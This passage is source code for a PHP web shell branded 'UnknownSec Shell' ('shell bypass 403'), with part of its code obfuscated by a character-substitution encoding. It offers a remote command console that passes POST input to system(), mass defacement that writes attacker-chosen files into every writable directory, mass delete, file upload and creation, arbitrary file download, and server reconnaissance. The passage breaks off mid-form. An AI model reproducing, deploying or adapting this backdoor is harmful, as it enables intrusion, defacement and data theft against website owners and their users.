cl\xf5\xe6\xe6='\xea\xfbx\xea-c\xfbn\xea\xfbr'>\xf1\xebr</\xea\xf1>\r\n\t<\xea\xf1\xb5cl\xf5\xe6\xe6='\xea\xfbx\xea-c\xfbn\xea\xfbr'>\$\xf1\xe1wn\xfbr<gr>:</gr>\$\xf1grp</\xea\xf1>\r\n\t<\xea\xf1\xb5cl\xf5\xe6\xe6='\xea\xfbx\xea-c\xfbn\xea\xfbr'>\";\r\n\xebf(\xeb\xe6_wr\xeb\xea\xf5bl\xfb(\"\$p\xf5\xea\xed/\$\xf1\xebr\"))\xb5\xfbc\xed\xe1\xb5'<gr>';\r\n\xfbl\xe6\xfb\xebf(!\xeb\xe6_r\xfb\xf5\xf1\xf5bl\xfb(\"\$p\xf5\xea\xed/\$\xf1\xebr\"))\xb5\xfbc\xed\xe1\xb5'<r\xf1>';\r\n\xfbc\xed\xe1\xb5p(\"\$p\xf5\xea\xed/\$\xf1\xebr\");\r\n\xebf(\xeb\xe6_wr\xeb\xea\xf5bl\xfb(\"\$p\xf5\xea\xed/\$\xf1\xebr\")\xb5||\xb5!\xeb\xe6_r\xfb\xf5\xf1\xf5bl\xfb(\"\$p\xf5\xea\xed/\$\xf1\xebr\"))\xb5\xfbc\xed\xe1\xb5'</gr></r\xf1></\xea\xf1>';\r\n\xfbc\xed\xe1\xb5\"\r\n\t<\xea\xf1\xb5cl\xf5\xe6\xe6=\\\"\xea\xfbx\xea-c\xfbn\xea\xfbr\\\">\r\n\t<f\xe1rm\xb5m\xfb\xea\xed\xe1\xf1=\\\"POST\\\"\xb5\xf5c\xea\xeb\xe1n=\\\"?\xe1p\xea\xeb\xe1n&p\xf5\xea\xed=\$p\xf5\xea\xed\\\">\r\n\t\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6=\\\"b\xean-gr\xe1\xe3p\\\">\r\n\t\t\t<b\xe3\xea\xea\xe1n\xb5cl\xf5\xe6\xe6=\\\"b\xean\xb5b\xean-\xe1\xe3\xeal\xebn\xfb-l\xebg\xed\xea\xb5b\xean-\xe6m\\\"\xb5n\xf5m\xfb=\\\"\xe1p\xea\\\"\xb5\xfd\xf5l\xe3\xfb=\\\"r\xfbn\xf5m\xfb\\\"><\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-p\xfbnc\xebl-f\xebll'></\xeb></b\xe3\xea\xea\xe1n>\r\n\t\t\t<b\xe3\xea\xea\xe1n\xb5cl\xf5\xe6\xe6=\\\"b\xean\xb5b\xean-\xe1\xe3\xeal\xebn\xfb-l\xebg\xed\xea\xb5b\xean-\xe6m\\\"\xb5n\xf5m\xfb=\\\"\xe1p\xea\\\"\xb5\xfd\xf5l\xe3\xfb=\\\"\xf1\xfbl\xfb\xea\xfb\\\"><\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-\xear\xf5\xe6\xed-f\xebll'></\xeb></b\xe3\xea\xea\xe1n>\r\n\t\t</\xf1\xeb\xfd>\r\n\t\t<\xebnp\xe3\xea\xb5\xeayp\xfb=\\\"\xed\xeb\xf1\xf1\xfbn\\\"\xb5n\xf5m\xfb=\\\"\xeayp\xfb\\\"\xb5\xfd\xf5l\xe3\xfb=\\\"\xf1\xebr\\\">\r\n\t\t<\xebnp\xe3\xea\xb5\xeayp\xfb=\\\"\xed\xeb\xf1\xf1\xfbn\\\"\xb5n\xf5m\xfb=\\\"n\xf5m\xfb\\\"\xb5\xfd\xf5l\xe3\xfb=\\\"\$\xf1\xebr\\\">\r\n\t\t<\xebnp\xe3\xea\xb5\xeayp\xfb=\\\"\xed\xeb\xf1\xf1\xfbn\\\"\xb5n\xf5m\xfb=\\\"p\xf5\xea\xed\\\"\xb5\xfd\xf5l\xe3\xfb=\\\"\$p\xf5\xea\xed/\$\xf1\xebr\\\">\r\n\t</f\xe1rm>\r\n\t</\xea\xf1>\r\n</\xear>\";\r\n}\r\nf\xe1r\xfb\xf5c\xed(\$\xe6c\xf5n\xf1\xebr\xb5\xf5\xe6\xb5\$f\xebl\xfb){\r\n\$f\xea\xb5=\xb5\xf1\xf5\xea\xfb(\"Y-m-\xf1\xb5H:\xeb:\xe6\",\xb5f\xebl\xfbm\xea\xebm\xfb(\"\$p\xf5\xea\xed/\$f\xebl\xfb\"));\r\n\t\xebf(!\xeb\xe6_f\xebl\xfb(\$p\xf5\xea\xed.'/'.\$f\xebl\xfb))\xb5c\xe1n\xea\xebn\xe3\xfb;\r\n\t\xebf(f\xe3nc\xea\xeb\xe1n_\xfbx\xeb\xe6\xea\xe6('p\xe1\xe6\xebx_g\xfb\xeapw\xe3\xeb\xf1'))\xb5{\r\n\t\t\$f\xe1wn\xfbr\xb5=\xb5@p\xe1\xe6\xebx_g\xfb\xeapw\xe3\xeb\xf1(f\xebl\xfb\xe1wn\xfbr(\"\$p\xf5\xea\xed/\$f\xebl\xfb\"));\r\n\t\t\$f\xe1wn\xfbr\xb5=\xb5\$f\xe1wn\xfbr['n\xf5m\xfb'];\r\n\t}\xb5\xfbl\xe6\xfb\xb5{\r\n\t\t\$f\xe1wn\xfbr\xb5=\xb5f\xebl\xfb\xe1wn\xfbr(\"\$p\xf5\xea\xed/\$f\xebl\xfb\");\r\n\t}\r\n\t\xebf(f\xe3nc\xea\xeb\xe1n_\xfbx\xeb\xe6\xea\xe6('p\xe1\xe6\xebx_g\xfb\xeagrg\xeb\xf1'))\xb5{\r\n\t\t\$fgrp\xb5=\xb5@p\xe1\xe6\xebx_g\xfb\xeagrg\xeb\xf1(f\xebl\xfbgr\xe1\xe3p(\"\$p\xf5\xea\xed/\$f\xebl\xfb\"));\r\n\t\t\$fgrp\xb5=\xb5\$fgrp['n\xf5m\xfb'];\r\n\t}\xb5\xfbl\xe6\xfb\xb5{\r\n\t\t\$fgrp\xb5=\xb5f\xebl\xfbgr\xe1\xe3p(\"\$p\xf5\xea\xed/\$f\xebl\xfb\");\r\n\t}\r\n\xfbc\xed\xe1\xb5\"\r\n<\xear>\r\n\t<\xea\xf1><\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-f\xebl\xfb-\xfb\xf5rm\xf5rk-c\xe1\xf1\xfb-f\xebll'></\xeb><\xf5\xb5cl\xf5\xe6\xe6='\xea\xfbx\xea-\xf1\xfbc\xe1r\xf5\xea\xeb\xe1n-n\xe1n\xfb\xb5\xea\xfbx\xea-\xe6\xfbc\xe1n\xf1\xf5ry'\xb5\xedr\xfbf=\\\"?f\xebl\xfb\xe6rc=\$p\xf5\xea\xed/\$f\xebl\xfb&p\xf5\xea\xed=\$p\xf5\xea\xed\\\">\$f\xebl\xfb</\xf5></\xea\xf1>\r\n\t<\xea\xf1\xb5cl\xf5\xe6\xe6='\xea\xfbx\xea-c\xfbn\xea\xfbr'>\$f\xea</\xea\xf1>\r\n\t<\xea\xf1\xb5cl\xf5\xe6\xe6='\xea\xfbx\xea-c\xfbn\xea\xfbr'>\".\xe6z(f\xebl\xfb\xe6\xebz\xfb(\$f\xebl\xfb)).\"</\xea\xf1>\r\n\t<\xea\xf1\xb5cl\xf5\xe6\xe6='\xea\xfbx\xea-c\xfbn\xea\xfbr'>\$f\xe1wn\xfbr<gr>:</gr>\$fgrp</\xea\xf1>\r\n\t<\xea\xf1\xb5cl\xf5\xe6\xe6='\xea\xfbx\xea-c\xfbn\xea\xfbr'>\";\r\n\xebf(\xeb\xe6_wr\xeb\xea\xf5bl\xfb(\"\$p\xf5\xea\xed/\$f\xebl\xfb\"))\xb5\xfbc\xed\xe1\xb5'<gr>';\r\n\xfbl\xe6\xfb\xebf(!\xeb\xe6_r\xfb\xf5\xf1\xf5bl\xfb(\"\$p\xf5\xea\xed/\$f\xebl\xfb\"))\xb5\xfbc\xed\xe1\xb5'<r\xf1>';\r\n\xfbc\xed\xe1\xb5p(\"\$p\xf5\xea\xed/\$f\xebl\xfb\");\r\n\xebf(\xeb\xe6_wr\xeb\xea\xf5bl\xfb(\"\$p\xf5\xea\xed/\$f\xebl\xfb\")\xb5||\xb5!\xeb\xe6_r\xfb\xf5\xf1\xf5bl\xfb(\"\$p\xf5\xea\xed/\$f\xebl\xfb\"))\xb5\xfbc\xed\xe1\xb5'</gr></r\xf1></\xea\xf1>';\r\n\xfbc\xed\xe1\xb5\"\r\n\t<\xea\xf1\xb5cl\xf5\xe6\xe6=\\\"\xea\xfbx\xea-c\xfbn\xea\xfbr\\\">\r\n\t\t<f\xe1rm\xb5m\xfb\xea\xed\xe1\xf1=\\\"POST\\\"\xb5\xf5c\xea\xeb\xe1n=\\\"?\xe1p\xea\xeb\xe1n&p\xf5\xea\xed=\$p\xf5\xea\xed\\\">\r\n\t\t\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6=\\\"b\xean-gr\xe1\xe3p\\\">\r\n\t\t\t\t<b\xe3\xea\xea\xe1n\xb5cl\xf5\xe6\xe6=\\\"b\xean\xb5b\xean-\xe1\xe3\xeal\xebn\xfb-l\xebg\xed\xea\xb5b\xean-\xe6m\\\"\xb5n\xf5m\xfb=\\\"\xe1p\xea\\\"\xb5\xfd\xf5l\xe3\xfb=\\\"\xfb\xf1\xeb\xea\\\"><\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-p\xfbnc\xebl-\xe6q\xe3\xf5r\xfb'></\xeb></b\xe3\xea\xea\xe1n>\r\n\t\t\t\t<b\xe3\xea\xea\xe1n\xb5cl\xf5\xe6\xe6=\\\"b\xean\xb5b\xean-\xe1\xe3\xeal\xebn\xfb-l\xebg\xed\xea\xb5b\xean-\xe6m\\\"\xb5n\xf5m\xfb=\\\"\xe1p\xea\\\"\xb5\xfd\xf5l\xe3\xfb=\\\"r\xfbn\xf5m\xfb\\\"><\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-p\xfbnc\xebl-f\xebll'></\xeb></b\xe3\xea\xea\xe1n>\r\n\t\t\t\t<b\xe3\xea\xea\xe1n\xb5cl\xf5\xe6\xe6=\\\"b\xean\xb5b\xean-\xe1\xe3\xeal\xebn\xfb-l\xebg\xed\xea\xb5b\xean-\xe6m\\\"\xb5n\xf5m\xfb=\\\"\xe1p\xea\\\"\xb5\xfd\xf5l\xe3\xfb=\\\"\xf1\xe1wnl\xe1\xf5\xf1\\\"><\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-\xf1\xe1wnl\xe1\xf5\xf1'></\xeb></b\xe3\xea\xea\xe1n>\r\n\t\t\t\t<b\xe3\xea\xea\xe1n\xb5cl\xf5\xe6\xe6=\\\"b\xean\xb5b\xean-\xe1\xe3\xeal\xebn\xfb-l\xebg\xed\xea\xb5b\xean-\xe6m\\\"\xb5n\xf5m\xfb=\\\"\xe1p\xea\\\"\xb5\xfd\xf5l\xe3\xfb=\\\"\xf1\xfbl\xfb\xea\xfb\\\"><\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-\xear\xf5\xe6\xed-f\xebll'></\xeb></b\xe3\xea\xea\xe1n>\r\n\t\t\t</\xf1\xeb\xfd>\r\n\t\t\t<\xebnp\xe3\xea\xb5\xeayp\xfb=\\\"\xed\xeb\xf1\xf1\xfbn\\\"\xb5n\xf5m\xfb=\\\"\xeayp\xfb\\\"\xb5\xfd\xf5l\xe3\xfb=\\\"f\xebl\xfb\\\">\r\n\t\t\t<\xebnp\xe3\xea\xb5\xeayp\xfb=\\\"\xed\xeb\xf1\xf1\xfbn\\\"\xb5n\xf5m\xfb=\\\"n\xf5m\xfb\\\"\xb5\xfd\xf5l\xe3\xfb=\\\"\$f\xebl\xfb\\\">\r\n\t\t\t<\xebnp\xe3\xea\xb5\xeayp\xfb=\\\"\xed\xeb\xf1\xf1\xfbn\\\"\xb5n\xf5m\xfb=\\\"p\xf5\xea\xed\\\"\xb5\xfd\xf5l\xe3\xfb=\\\"\$p\xf5\xea\xed/\$f\xebl\xfb\\\">\r\n\t\t</f\xe1rm>\r\n\t</\xea\xf1>\r\n</\xear>\";\r\n\t}\r\n}\r\n\xfbc\xed\xe1\xb5\"\r\n</\xeab\xe1\xf1y>\r\n</\xea\xf5bl\xfb>\r\n<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='\xea\xfbx\xea-\xe6\xfbc\xe1n\xf1\xf5ry'>&c\xe1py;\xb5\".\xf1\xf5\xea\xfb(\"Y\").\"\xb5\$_n</\xf1\xeb\xfd>\r\n</\xf1\xeb\xfd>\r\n</\xf1\xeb\xfd>\r\n</b\xe1\xf1y>\r\n</\xed\xeaml>\";\r\n";
    $str = ['�', '�', '�', '�', '�', '�', '�', '�', '�', '�', '�'];
    $rplc = ['a', 'i', 'u', 'e', 'o', 'd', 's', 'h', 'v', 't', ' '];
    $nav = "\r\ndate_default_timezone_set('Asia/Jakarta');\r\n\$_n = 'UnknownSec';\r\n\$_s = \"<style>table{display:none;}</style><div class='table-responsive'><hr></div>\";\r\n\$_r = \"required='required'\";\r\n\$_x = \"<i class='bi bi-gear-fill'></i>\";\r\nif(isset(\$_GET['option']) && \$_POST['opt'] == 'download'){\r\n\theader('Content-type: text/plain');\r\n\theader('Content-Disposition: attachment; filename=\"'.\$_POST['name'].'\"');\r\necho(file_get_contents(\$_POST['path']));\r\nexit();\r\n}\r\nfunction \xe2\x96\x9f(\$dir,\$p) {\r\nif(isset(\$_GET['path'])) {\r\n\t\$\xe2\x96\x9a = \$_GET['path'];\r\n} else {\r\n\t\$\xe2\x96\x9a = getcwd();\r\n}\r\nif(is_writable(\$\xe2\x96\x9a)) {\r\n\treturn \"<gr>\".\$p.\"</gr>\";\r\n} else {\r\n\treturn \"<rd>\".\$p.\"</rd>\";\r\n\t}\r\n}\r\nfunction ok(){\r\n\techo '<div class=\"alert alert-success alert-dismissible fade show my-3\" role=\"alert\"><button type=\"button\" class=\"btn-close\" data-bs-dismiss=\"alert\" aria-label=\"Close\"></button>';\r\n}\r\nfunction er(){\r\n\techo '<div class=\"alert alert-danger alert-dismissible fade show my-3\" role=\"alert\"><button type=\"button\" class=\"btn-close\" data-bs-dismiss=\"alert\" aria-label=\"Close\"></button>';\r\n}\r\nfunction sz(\$byt){\r\n\t\$sz = array('B', 'KB', 'MB', 'GB', 'TB');\r\n\tfor(\$i = 0; \$byt >= 1024 && \$i < (count(\$sz) -1 ); \$byt /= 1024, \$i++ );\r\n\treturn(round(\$byt,2).\" \".\$sz[\$i]);\r\n}\r\nfunction ip() {\r\n\t\$ipas = '';\r\nif(getenv('HTTP_CLIENT_IP'))\r\n\t\$ipas = getenv('HTTP_CLIENT_IP');\r\nelse if(getenv('HTTP_X_FORWARDED_FOR'))\r\n\t\$ipas = getenv('HTTP_X_FORWARDED_FOR');\r\nelse if(getenv('HTTP_X_FORWARDED'))\r\n\t\$ipas = getenv('HTTP_X_FORWARDED');\r\nelse if(getenv('HTTP_FORWARDED_FOR'))\r\n\t\$ipas = getenv('HTTP_FORWARDED_FOR');\r\nelse if(getenv('HTTP_FORWARDED'))\r\n\t\$ipas = getenv('HTTP_FORWARDED');\r\nelse if(getenv('REMOTE_ADDR'))\r\n\t\$ipas = getenv('REMOTE_ADDR');\r\nelse\r\n\t\$ipas = 'IP tidak dikenali';\r\nreturn \$ipas;\r\n}\r\nfunction p(\$file){\r\nif(\$p = @fileperms(\$file)){\r\n\t\$i = 'u';\r\nif((\$p & 0xC000) == 0xC000)\$i = 's';\r\nelseif((\$p & 0xA000) == 0xA000)\$i = 'l';\r\nelseif((\$p & 0x8000) == 0x8000)\$i = '-';\r\nelseif((\$p & 0x6000) == 0x6000)\$i = 'b';\r\nelseif((\$p & 0x4000) == 0x4000)\$i = 'd';\r\nelseif((\$p & 0x2000) == 0x2000)\$i = 'c';\r\nelseif((\$p & 0x1000) == 0x1000)\$i = 'p';\r\n\t\$i .= (\$p & 00400)? 'r':'-';\r\n\t\$i .= (\$p & 00200)? 'w':'-';\r\n\t\$i .= (\$p & 00100)? 'x':'-';\r\n\t\$i .= (\$p & 00040)? 'r':'-';\r\n\t\$i .= (\$p & 00020)? 'w':'-';\r\n\t\$i .= (\$p & 00010)? 'x':'-';\r\n\t\$i .= (\$p & 00004)? 'r':'-';\r\n\t\$i .= (\$p & 00002)? 'w':'-';\r\n\t\$i .= (\$p & 00001)? 'x':'-';\r\nreturn \$i;\r\n\t}\r\n\telse return \"- ?? -\";\r\n}\r\necho \"\r\n<!DOCTYPE HTML>\r\n<html>\r\n\t<head>\r\n\t\t<meta name='author' content='\$_n'>\r\n\t\t<meta name='robots' content='noindex,nofollow'>\r\n\t\t<title>\".\$_SERVER['HTTP_HOST'].\" - \$_n</title>\r\n\t\t<meta name='viewport' content='width=device-width, initial-scale=0.70'>\r\n\t\t<link rel='stylesheet' href='//random-php.ftp.sh/style.css'>\r\n\t\t<script src='//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js'></script>\r\n\t\t<script src='//cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js'></script>\r\n\t\t<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>\r\n\t</head>\r\n<style>\r\n.shell {\r\n\tborder-radius: 4px;\r\n\tborder: 1px solid rgba(255, 255, 255, 0.4);\r\n\tfont-size: 10pt;\r\n\tdisplay: flex;\r\n\tflex-direction: column;\r\n\talign-items: stretch;\r\n\tbackground: #242424;\r\n\tcolor: #fff;\r\n}\r\n.pre {\r\n\theight: 500px;\r\n\toverflow: auto;\r\n\twhite-space: pre-wrap;\r\n\tflex-grow: 1;\r\n\tmargin:10px auto;\r\n\tpadding:10px;\r\n\tline-height:1.3em;\r\n\toverflow-x:scroll;\r\n}\r\n</style>\r\n<body class='bg-secondary text-light'>\r\n<div class='container-fluid'>\r\n\t<div class='py-3' id='main'>\r\n\t\t<div class='box shadow bg-dark p-4 rounded-3'>\r\n\t\t\t<div class='corner text-secondary'>shell bypass 403</div>\r\n\t\t\t\t<a class='text-decoration-none text-light' href='\".\$_SERVER['PHP_SELF'].\"'><h4>\$_n Shell</h4></a>\";\r\n\t\t\t\tif(isset(\$_GET['path'])){\r\n\t\t\t\t\t\$path = \$_GET['path'];\r\n\t\t\t\t} else {\r\n\t\t\t\t\t\$path = getcwd();\r\n\t\t\t\t}\r\n\t\t\t\t\t\$path = str_replace('\\\\','/',\$path);\r\n\t\t\t\t\t\$paths = explode('/',\$path);\r\n\t\t\t\tforeach(\$paths as \$id=>\$pat){\r\n\t\t\t\tif(\$pat == '' && \$id == 0){\r\n\t\t\t\t\t\$a = true;\r\n\t\t\t\t\techo '<div class=\"table-responsive\"><i class=\"bi bi-hdd-rack\"></i> : <a class=\"text-decoration-none text-light\" href=\"?path=/\">/</a>';\r\n\t\t\t\tcontinue;\r\n\t\t\t\t}\r\n\t\t\t\tif(\$pat == '') continue;\r\n\t\t\t\t\techo '<a class=\"text-decoration-none\" href=\"?path=';\r\n\t\t\t\tfor(\$i=0;\$i<=\$id;\$i++){\r\n\t\t\t\t\techo \"\$paths[\$i]\";\r\n\t\t\t\tif(\$i != \$id) echo \"/\";\r\n\t\t\t\t}\r\n\t\t\t\techo '\">'.\$pat.'</a>/';\r\n\t\t\t\t}\r\n\t\t\t\techo \" [ \".\xe2\x96\x9f(\$path, p(\$path)).\" ]</div>\";\r\n\t\t\techo \"\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n<div class='container-fluid'>\r\n\t<div class='box shadow bg-dark p-4 rounded-3'>\r\n\t\t<div class='text-center'>\r\n\t\t\t<a class='btn btn-outline-light btn-sm' href='?id=upload&path=\$path'><i class='bi bi-upload'></i> upload</a>\r\n\t\t\t<a class='btn btn-outline-light btn-sm' href='?id=deface&path=\$path'><i class='bi bi-exclamation-diamond'></i> mass deface</a>\r\n\t\t\t<a class='btn btn-outline-light btn-sm' href='?id=delete&path=\$path'><i class='bi bi-trash'></i> mass delete</a>\r\n\t\t\t<a class='btn btn-outline-light btn-sm' href='?id=cmd&path=\$path'><i class='bi bi-terminal'></i> console</a>\r\n\t\t\t<a class='btn btn-outline-light btn-sm' href='?id=info&path=\$path'><i class='bi bi-info-circle'></i> info server</a>\r\n\t\t</div>\";\r\n// tools nya\r\nif(isset(\$_GET['path'])) {\r\n\t\$dir = \$_GET['path'];\r\n\tchdir(\$dir);\r\n} else {\r\n\t\$dir = getcwd();\r\n}\r\n\$dir = str_replace(\"\\\\\",\"/\",\$dir);\r\n\$scdir = explode(\"/\", \$dir);\t\r\nfor(\$i = 0; \$i <= \$c_dir; \$i++) {\r\n\t\$scdir[\$i];\r\n\tif(\$i != \$c_dir) {\r\n} elseif(\$_GET['id'] == 'deface'){\r\necho \"\$_s\";\r\nfunction mass_kabeh(\$dir,\$namafile,\$isi_script) {\r\nif(is_writable(\$dir)) {\r\n\t\$dira = scandir(\$dir);\r\n\tforeach(\$dira as \$dirb) {\r\n\t\t\$dirc = \"\$dir/\$dirb\";\r\n\t\t\$\xe2\x96\x9a = \$dirc.'/'.\$namafile;\r\n\t\tif(\$dirb === '.') {\r\n\t\t\tfile_put_contents(\$\xe2\x96\x9a, \$isi_script);\r\n\t\t} elseif(\$dirb === '..') {\r\n\t\t\tfile_put_contents(\$\xe2\x96\x9a, \$isi_script);\r\n\t\t} else {\r\n\t\t\tif(is_dir(\$dirc)) {\r\n\t\t\t\tif(is_writable(\$dirc)) {\r\n\t\t\t\t\techo \"[<gr><i class='bi bi-check-all'></i></gr>]&nbsp;\$\xe2\x96\x9a<br>\";\r\n\t\t\t\t\tfile_put_contents(\$\xe2\x96\x9a, \$isi_script);\r\n\t\t\t\t\t\$\xe2\x96\x9f = mass_kabeh(\$dirc,\$namafile,\$isi_script);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\nfunction mass_biasa(\$dir,\$namafile,\$isi_script) {\r\n\tif(is_writable(\$dir)) {\r\n\t\t\$dira = scandir(\$dir);\r\n\t\tforeach(\$dira as \$dirb) {\r\n\t\t\t\$dirc = \"\$dir/\$dirb\";\r\n\t\t\t\$\xe2\x96\x9a = \$dirc.'/'.\$namafile;\r\n\t\t\tif(\$dirb === '.') {\r\n\t\t\t\tfile_put_contents(\$\xe2\x96\x9a, \$isi_script);\r\n\t\t\t} elseif(\$dirb === '..') {\r\n\t\t\t\tfile_put_contents(\$\xe2\x96\x9a, \$isi_script);\r\n\t\t\t} else {\r\n\t\t\t\tif(is_dir(\$dirc)) {\r\n\t\t\t\t\tif(is_writable(\$dirc)) {\r\n\t\t\t\t\t\techo \"[<gr><i class='bi bi-check-all'></i></gr>]&nbsp;\$dirb/\$namafile<br>\";\r\n\t\t\t\t\t\tfile_put_contents(\$\xe2\x96\x9a, \$isi_script);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\nif(\$_POST['start']) {\r\n\tif(\$_POST['tipe'] == 'massal') {\r\n\tmass_kabeh(\$_POST['d_dir'], \$_POST['d_file'], \$_POST['script']);\r\n\t} elseif(\$_POST['tipe'] == 'biasa') {\r\n\tmass_biasa(\$_POST['d_dir'], \$_POST['d_file'], \$_POST['script']);\r\n\t}\r\n\techo \"<br>\";\r\n}\r\necho \"\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>\r\n\t\t<form method='POST'>\r\n\t\t<kbd>\$_x&nbsp;Mass deface</kbd>\r\n\t\t<br>Tipe:<br>\r\n\t\t<div class='custom-control custom-switch'>\r\n\t\t\t<input class='custom-control-input' type='checkbox' id='customSwitch' name='tipe' value='biasa'>\r\n\t\t\t<label class='custom-control-label' for='customSwitch'>Biasa</label>\r\n\t\t</div>\r\n\t\t<div class='custom-control custom-switch'>\r\n\t\t\t<input class='custom-control-input' type='checkbox' id='customSwitch1' name='tipe' value='massal'>\r\n\t\t\t<label class='custom-control-label' for='customSwitch1'>Massal</label>\r\n\t\t</div>\r\n\t\t\t<i class='bi bi-folder'></i> Lokasi:\r\n\t\t\t<input class='form-control btn-sm' type='text' name='d_dir' value='\$dir'>\r\n\t\t\t<i class='bi bi-file-earmark'></i> Nama file:\r\n\t\t\t<input class='form-control btn-sm' type='text' name='d_file' placeholder='nama file' \$_r>\r\n\t\t\t<i class='bi bi-file-earmark'></i> Isi file:\r\n\t\t\t<textarea class='form-control btn-sm' rows='7' name='script' placeholder='isi file' \$_r></textarea>\r\n\t\t\t<input class='btn btn-dark btn-sm btn-block' type='submit' name='start' value='mass deface'>\r\n\t\t</form>\r\n\t</div>\r\n</div>\r\n<br>\";\r\n} elseif(\$_GET['id'] == 'cmd'){\r\nif(\$_POST['ekseCMD']) {\r\n\$cmd = \$_POST['ekseCMD'];\r\n}\r\necho \"\$_s\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>\r\n\t<kbd>\$_x&nbsp;Console</kbd>\r\n\t\t<div class='container-fluid language-javascript'>\r\n\t\t\t<pre style='font-size:10px;'><gr>~</gr>\$&nbsp;<rd>\$cmd</rd><br><code>\"; system(\$_POST['ekseCMD'].' 2>&1'); echo \"</code></pre>\r\n\t\t</div>\r\n\t\t<form method='POST'>\r\n\t\t\t<div class='input-group mb-3'>\r\n\t\t\t\t<input class='form-control btn-sm' type='text' name='ekseCMD' value='\$cmd' placeholder='whoami' \$_r>\r\n\t\t\t\t<button class='btn btn-dark btn-sm' type='sumbit'><i class='bi bi-arrow-return-right'></i></button>\r\n\t\t\t</div>\r\n\t\t</form>\r\n\t</div>\r\n</div>\r\n<br>\";\r\n} elseif(\$_GET['id'] == 'info'){\r\n\$disfunc = @ini_get(\"disable_functions\");\r\nif(empty(\$disfunc)) {\r\n\t\$disfc = \"<gr>NONE</gr>\";\r\n} else {\r\n\t\$disfc = \"<rd>\$disfunc</rd>\";\r\n}\r\nif(!function_exists('posix_getegid')) {\r\n\t\$user = @get_current_user();\r\n\t\$uid = @getmyuid();\r\n\t\$gid = @getmygid();\r\n\t\$group = \"?\";\r\n} else {\r\n\t\$uid = @posix_getpwuid(posix_geteuid());\r\n\t\$gid = @posix_getgrgid(posix_getegid());\r\n\t\$user = \$uid['name'];\r\n\t\$uid = \$uid['uid'];\r\n\t\$group = \$gid['name'];\r\n\t\$gid = \$gid['gid'];\r\n}\r\n\$sm = (@ini_get(strtolower(\"safe_mode\")) == 'on') ? \"<rd>ON</rd>\" : \"<gr>OFF</gr>\";\r\necho \"\$_s\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>\r\n\t<kbd>\$_x&nbsp;Info server</kbd>\r\n\t\t<br>\r\n\t\tUname: <gr>\".php_uname().\"</gr><br />\r\n\t\tSoftware: <gr>\".\$_SERVER['SERVER_SOFTWARE'].\"</gr><br />\r\n\t\tPHP version: <gr>\".PHP_VERSION.\"</gr> <a class='text-decoration-none' href='?id=phpinfo&path=\$path'>[ PHP INFO ]</a> PHP os: <gr>\".PHP_OS.\"</gr><br />\r\n\t\tServer Ip: <gr>\".gethostbyname(\$_SERVER['HTTP_HOST']).\"</gr><br />\r\n\t\tYour Ip: <gr>\".ip().\"</gr><br />\r\n\t\tUser: <gr>\$user</gr> (\$uid) | Group: <gr>\$group</gr> (\$gid)<br />\r\n\t\tSafe Mode: \$sm<br />\r\n\t\t<kbd>Disable Function:</kbd><pre>\$disfc</pre>\r\n\t</div>\r\n</div>\r\n<br>\";\r\n} elseif(\$_GET['id'] == 'phpinfo'){\r\n\t@ob_start();\r\n\t@eval(\"phpinfo();\");\r\n\t\$buff = @ob_get_contents();\r\n\t@ob_end_clean();\t\r\n\t\$awal = strpos(\$buff,\"<body>\")+6;\r\n\t\$akhir = strpos(\$buff,\"</body>\");\r\n\techo \"<pre class='php_info'>\".substr(\$buff,\$awal,\$akhir-\$awal).\"</pre>\";\r\n\texit;\r\n} elseif(\$_GET['id'] == 'upload'){\r\necho \"\$_s\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>\";\r\nif(isset(\$_FILES['file'])){\r\n\tif(copy(\$_FILES['file']['tmp_name'],\$path.'/'.\$_FILES['file']['name'])){\r\n\t\techo '<strong>Upload</strong> ok! '.ok().'</div>';\r\n\t\t} else {\r\n\t\techo '<strong>Upload</strong> gagal! '.er().'</div>';\r\n\t\t}\r\n\t}\r\necho \"\r\n\t\t<form method='POST' enctype='multipart/form-data'>\r\n\t\t\t<kbd>\$_x&nbsp;Upload File</kbd>\r\n\t\t\t<div class='input-group mb-3'>\r\n\t\t\t\t<input class='form-control form-control-sm' type='file' name='file' \$_r>\r\n\t\t\t\t<button class='btn btn-dark btn-sm' type='submit'><i class='bi bi-arrow-return-right'></i></button>\r\n\t\t\t</div>\r\n\t\t</form>\r\n\t</div>\r\n</div>\r\n<br>\";\r\n} elseif(\$_GET['id'] == 'filebaru') {\r\necho \"\$_s\";\r\nif(isset(\$_POST['bikin'])){\r\n\t\$name = \$_POST['nama_file'];\r\n\t\$isi_file = \$_POST['isi_file'];\r\n\tforeach (\$name as \$nama_file){\r\n\t\t\$handle = @fopen(\"\$nama_file\", \"w\");\r\n\t\tif(\$isi_file){\r\n\t\t\t\$buat = @fwrite(\$handle, \$isi_file);\r\n\t\t} else {\r\n\t\t\t\$buat = \$handle;\r\n\t\t}\r\n\t}\r\n\tif(\$buat){\r\n\t\techo '<strong>Buat file</strong> ok! '.ok().'</div>';\r\n\t} else {\r\n\t\techo '<strong>Buat file</strong> gagal! '.er().'</div>';\r\n\t\t}\r\n\t}\r\necho \"\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>\r\n\t\t<kbd>\$_x&nbsp;Buat file</kbd>\r\n\t\t<form method='POST'>\r\n\t\t\t<i class='bi bi-file-earmark'></i> Nama file:\r\n\t\t\t<input class='form-control form-control-sm' type='text' name='nama_file[]' placeholder='Nama file' 